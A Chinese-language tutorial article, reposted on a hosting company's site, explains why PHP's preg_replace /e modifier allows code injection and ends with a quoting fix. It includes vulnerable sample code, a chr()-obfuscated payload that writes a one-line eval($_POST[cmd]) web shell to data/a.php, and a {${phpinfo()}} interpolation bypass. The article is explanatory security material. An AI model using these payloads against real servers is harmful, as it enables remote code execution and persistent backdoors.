php中使用preg_replace危險的/e修飾符需要注意什么-創(chuàng)新互聯(lián)

這篇文章給大家分享的是有關(guān)php中使用preg_replace危險的/e修飾符需要注意什么的內(nèi)容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

創(chuàng)新互聯(lián)專業(yè)提供服務(wù)器托管服務(wù),為用戶提供五星數(shù)據(jù)中心、電信、雙線接入解決方案,用戶可自行在線購買服務(wù)器托管服務(wù),并享受7*24小時金牌售后服務(wù)。

preg_replace函數(shù)原型:

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

特別說明:
/e 修正符使 preg_replace() 將 replacement 參數(shù)當(dāng)作 PHP 代碼(在適當(dāng)?shù)哪嫦蛞锰鎿Q完之后)。提示:要確保 replacement 構(gòu)成一個合法的 PHP 代碼字符串,否則 PHP 會在報告在包含 preg_replace() 的行中出現(xiàn)語法解析錯誤。
舉例:



復(fù)制代碼 代碼如下:


<?php
preg_replace ("/(</?)(w+)([^>]*>)/e",
"\1.strtoupper(\2).\3",
$html_body);
?>




這將使輸入字符串中的所有 HTML 標(biāo)記變成大寫。

安全威脅分析:
通常subject參數(shù)是由客戶端產(chǎn)生的,客戶端可能會構(gòu)造惡意的代碼,例如:



復(fù)制代碼 代碼如下:


<?
echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>




如果我們提交?h=phpinfo(),phpinfo()將會被執(zhí)行(使用/e修飾符,preg_replace會將 replacement 參數(shù)當(dāng)作 PHP 代碼執(zhí)行)。
如果我們提交下面的代碼會怎么樣呢?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
密文對應(yīng)的明文是:fputs(fopen(data/a.php,w),<?php eval($_POST[cmd])?>);
執(zhí)行的結(jié)果是在/data/目錄下生成一個一句話木馬文件 a.php。

再來一個有難度的例子:



復(fù)制代碼 代碼如下:


<?
function test($str)
{
}
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("\1")', $_GET["h"]);
?>




提交 ?h=[php]phpinfo()[/php],phpinfo()會被執(zhí)行嗎?
肯定不會。因為經(jīng)過正則匹配后, replacement 參數(shù)變?yōu)?#39;test("phpinfo")',此時phpinfo僅是被當(dāng)做一個字符串參數(shù)了。
有沒有辦法讓它執(zhí)行呢?


當(dāng)然有。在這里我們?nèi)绻峤?h=[php]{${phpinfo()}}[/php],phpinfo()就會被執(zhí)行。為什么呢?
在php中,雙引號里面如果包含有變量,php解釋器會將其替換為變量解釋后的結(jié)果;單引號中的變量不會被處理。
注意:雙引號中的函數(shù)不會被執(zhí)行和替換。

在這里我們需要通過{${}}構(gòu)造出了一個特殊的變量,'test("{${phpinfo()}}")',達到讓函數(shù)被執(zhí)行的效果(${phpinfo()}會被解釋執(zhí)行)。
可以先做如下測試:



復(fù)制代碼 代碼如下:


echo "{${phpinfo()}}";




phpinfo會被成功執(zhí)行了。

如何防范這種漏洞呢?
將'test("\1")' 修改為"test('\1')",這樣‘${phpinfo()}'就會被當(dāng)做一個普通的字符串處理(單引號中的變量不會被處理)。

感謝各位的閱讀!關(guān)于“php中使用preg_replace危險的/e修飾符需要注意什么”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學(xué)到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

名稱欄目:php中使用preg_replace危險的/e修飾符需要注意什么-創(chuàng)新互聯(lián)
瀏覽地址:http://bm7419.com/article2/gepoc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供手機網(wǎng)站建設(shè)網(wǎng)站設(shè)計、動態(tài)網(wǎng)站、定制網(wǎng)站網(wǎng)站制作、服務(wù)器托管

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都網(wǎng)頁設(shè)計公司